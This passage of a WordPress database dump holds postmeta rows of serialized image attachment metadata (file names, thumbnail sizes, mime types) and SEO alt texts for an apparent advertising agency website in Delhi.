image\";a:4:{s:4:\"file\";s:18:\"Why-we-400x284.png\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:9:\"image/png\";}s:28:\"et-pb-portfolio-module-image\";a:4:{s:4:\"file\";s:18:\"Why-we-510x382.png\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:9:\"image/png\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:18:\"Why-we-400x516.png\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:9:\"image/png\";}s:30:\"et-pb-image--responsive--phone\";a:4:{s:4:\"file\";s:18:\"Why-we-480x373.png\";s:5:\"width\";i:480;s:6:\"height\";i:373;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(746,427,'_wp_attachment_image_alt','creative advertising agency'),(756,443,'_wp_attached_file','2020/08/Artboard-5.jpg'),(757,443,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:800;s:4:\"file\";s:22:\"2020/08/Artboard-5.jpg\";s:5:\"sizes\";a:9:{s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"Artboard-5-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"Artboard-5-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"Artboard-5-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:22:\"Artboard-5-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:31:\"et-pb-post-main-image-fullwidth\";a:4:{s:4:\"file\";s:22:\"Artboard-5-800x675.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:675;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:22:\"Artboard-5-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"et-pb-portfolio-module-image\";a:4:{s:4:\"file\";s:22:\"Artboard-5-510x382.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:22:\"Artboard-5-400x516.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:30:\"et-pb-image--responsive--phone\";a:4:{s:4:\"file\";s:22:\"Artboard-5-480x480.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(758,443,'_wp_attachment_image_alt','marketing strategy for success'),(760,446,'_wp_attached_file','2020/08/Artboard-Copy-12.png'),(761,446,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1080;s:6:\"height\";i:618;s:4:\"file\";s:28:\"2020/08/Artboard-Copy-12.png\";s:5:\"sizes\";a:10:{s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"Artboard-Copy-12-300x172.png\";s:5:\"width\";i:300;s:6:\"height\";i:172;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:29:\"Artboard-Copy-12-1024x586.png\";s:5:\"width\";i:1024;s:6:\"height\";i:586;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"Artboard-Copy-12-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:28:\"Artboard-Copy-12-768x439.png\";s:5:\"width\";i:768;s:6:\"height\";i:439;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:28:\"Artboard-Copy-12-400x250.png\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:28:\"Artboard-Copy-12-400x284.png\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:9:\"image/png\";}s:28:\"et-pb-portfolio-module-image\";a:4:{s:4:\"file\";s:28:\"Artboard-Copy-12-510x382.png\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:9:\"image/png\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:28:\"Artboard-Copy-12-400x516.png\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:9:\"image/png\";}s:31:\"et-pb-image--responsive--tablet\";a:4:{s:4:\"file\";s:28:\"Artboard-Copy-12-980x561.png\";s:5:\"width\";i:980;s:6:\"height\";i:561;s:9:\"mime-type\";s:9:\"image/png\";}s:30:\"et-pb-image--responsive--phone\";a:4:{s:4:\"file\";s:28:\"Artboard-Copy-12-480x275.png\";s:5:\"width\";i:480;s:6:\"height\";i:275;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(762,446,'_wp_attachment_image_alt','Advertising agency in delhi'),(763,470,'_wp_attached_file','2020/08/banner.jpg'),(764,470,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:728;s:4:\"file\";s:18:\"2020/08/banner.jpg\";s:5:\"sizes\";a:10:{s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"banner-300x213.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:213;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"banner-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:18:\"banner-768x546.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:546;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:18:\"banner-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:31:\"et-pb-post-main-image-fullwidth\";a:4:{s:4:\"file\";s:19:\"banner-1024x675.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:675;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:18:\"banner-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"et-pb-portfolio-module-image\";a:4:{s:4:\"file\";s:18:\"banner-510x382.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:18:\"banner-400x516.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:31:\"et-pb-image--responsive--tablet\";a:4:{s:4:\"file\";s:18:\"banner-980x697.jpg\";s:5:\"width\";i:980;s:6:\"height\";i:697;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:30:\"et-pb-image--responsive--phone\";a:4:{s:4:\"file\";s:18:\"banner-480x341.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:341;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(765,473,'_wp_attached_file','2020/08/434x434.jpg'),(766,473,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:434;s:6:\"height\";i:434;s:4:\"file\";s:19:\"2020/08/434x434.jpg\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"434x434-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"434x434-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:19:\"434x434-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:19:\"434x434-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"et-pb-portfolio-module-image\";a:4:{s:4:\"file\";s:19:\"434x434-434x382.jpg\";s:5:\"width\";i:434;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:19:\"434x434-400x434.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:434;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(767,474,'_wp_attached_file','2020/08/217x434.jpg'),(768,474,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:434;s:6:\"height\";i:217;s:4:\"file\";s:19:\"2020/08/217x434.jpg\";s:5:\"sizes\";a:5:{s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"217x434-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"217x434-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:19:\"217x434-400x217.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:217;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:19:\"217x434-400x217.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:217;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:19:\"217x434-400x217.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:217;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(775,485,'_wp_attached_file','2020/08/800x800..1.jpg'),(776,485,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:800;s:4:\"file\";s:22:\"2020/08/800x800..1.jpg\";s:5:\"sizes\";a:9:{s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"800x800..1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"800x800..1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"800x800..1-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:22:\"800x800..1-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:31:\"et-pb-post-main-image-fullwidth\";a:4:{s:4:\"file\";s:22:\"800x800..1-800x675.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:675;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:22:\"800x800..1-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"et-pb-portfolio-module-image\";a:4:{s:4:\"file\";s:22:\"800x800..1-510x382.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:22:\"800x800..1-400x516.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:30:\"et-pb-image--responsive--phone\";a:4:{s:4:\"file\";s:22:\"800x800..1-480x480.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(777,486,'_wp_attached_file','2020/08/800x800.jpg'),(778,486,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:800;s:4:\"file\";s:19:\"2020/08/800x800.jpg\";s:5:\"sizes\";a:9:{s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"800x800-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"800x800-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:19:\"800x800-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:19:\"800x800-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:31:\"et-pb-post-main-image-fullwidth\";a:4:{s:4:\"file\";s:19:\"800x800-800x675.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:675;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:19:\"800x800-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"et-pb-portfolio-module-image\";a:4:{s:4:\"file\";s:19:\"800x800-510x382.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:19:\"800x800-400x516.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:30:\"et-pb-image--responsive--phone\";a:4:{s:4:\"file\";s:19:\"800x800-480x480.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(779,489,'_wp_attached_file','2020/08/800x800-w.jpg'),(780,489,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:800;s:4:\"file\";s:21:\"2020/08/800x800-w.jpg\";s:5:\"sizes\";a:9:{s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"800x800-w-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"800x800-w-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"800x800-w-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:21:\"800x800-w-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:31:\"et-pb-post-main-image-fullwidth\";a:4:{s:4:\"file\";s:21:\"800x800-w-800x675.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:675;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:21:\"800x800-w-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"et-pb-portfolio-module-image\";a:4:{s:4:\"file\";s:21:\"800x800-w-510x382.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:21:\"800x800-w-400x516.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:30:\"et-pb-image--responsive--phone\";a:4:{s:4:\"file\";s:21:\"800x800-w-480x480.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(781,490,'_wp_attached_file','2020/08/800x400.jpg'),(782,490,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:400;s:4:\"file\";s:19:\"2020/08/800x400.jpg\";s:5:\"sizes\";a:8:{s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"800x400-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"800x400-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:19:\"800x400-768x384.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:384;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:19:\"800x400-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:19:\"800x400-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"et-pb-portfolio-module-image\";a:4:{s:4:\"file\";s:19:\"800x400-510x382.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:19:\"800x400-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:30:\"et-pb-image--responsive--phone\";a:4:{s:4:\"file\";s:19:\"800x400-480x240.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(783,427,'_edit_lock','1596819153:1'),(784,507,'_wp_attached_file','2020/08/Why-we.jpg'),(785,507,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:622;s:4:\"file\";s:18:\"2020/08/Why-we.jpg\";s:5:\"sizes\";a:8:{s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"Why-we-300x233.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:233;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"Why-we-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:18:\"Why-we-768x597.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:597;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:18:\"Why-we-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:18:\"Why-we-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"et-pb-portfolio-module-image\";a:4:{s:4:\"file\";s:18:\"Why-we-510x382.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:18:\"Why-we-400x516.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:30:\"et-pb-image--responsive--phone\";a:4:{s:4:\"file\";s:18:\"Why-we-480x373.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:373;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(786,507,'_wp_attachment_image_alt','creative advertising agency in Delhi'),(787,510,'_wp_attached_file','2020/08/Artboard-Copy-12-1.png'),(788,510,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1080;s:6:\"height\";i:618;s:4:\"file\";s:30:\"2020/08/Artboard-Copy-12-1.png\";s:5:\"sizes\";a:10:{s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"Artboard-Copy-12-1-300x172.png\";s:5:\"width\";i:300;s:6:\"height\";i:172;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:31:\"Artboard-Copy-12-1-1024x586.png\";s:5:\"width\";i:1024;s:6:\"height\";i:586;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"Artboard-Copy-12-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"Artboard-Copy-12-1-768x439.png\";s:5:\"width\";i:768;s:6:\"height\";i:439;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:30:\"Artboard-Copy-12-1-400x250.png\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:30:\"Artboard-Copy-12-1-400x284.png\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:9:\"image/png\";}s:28:\"et-pb-portfolio-module-image\";a:4:{s:4:\"file\";s:30:\"Artboard-Copy-12-1-510x382.png\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:9:\"image/png\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:30:\"Artboard-Copy-12-1-400x516.png\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:9:\"image/png\";}s:31:\"et-pb-image--responsive--tablet\";a:4:{s:4:\"file\";s:30:\"Artboard-Copy-12-1-980x561.png\";s:5:\"width\";i:980;s:6:\"height\";i:561;s:9:\"mime-type\";s:9:\"image/png\";}s:30:\"et-pb-image--responsive--phone\";a:4:{s:4:\"file\";s:30:\"Artboard-Copy-12-1-480x275.png\";s:5:\"width\";i:480;s:6:\"height\";i:275;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(789,510,'_wp_attachment_image_alt','Best Advertising 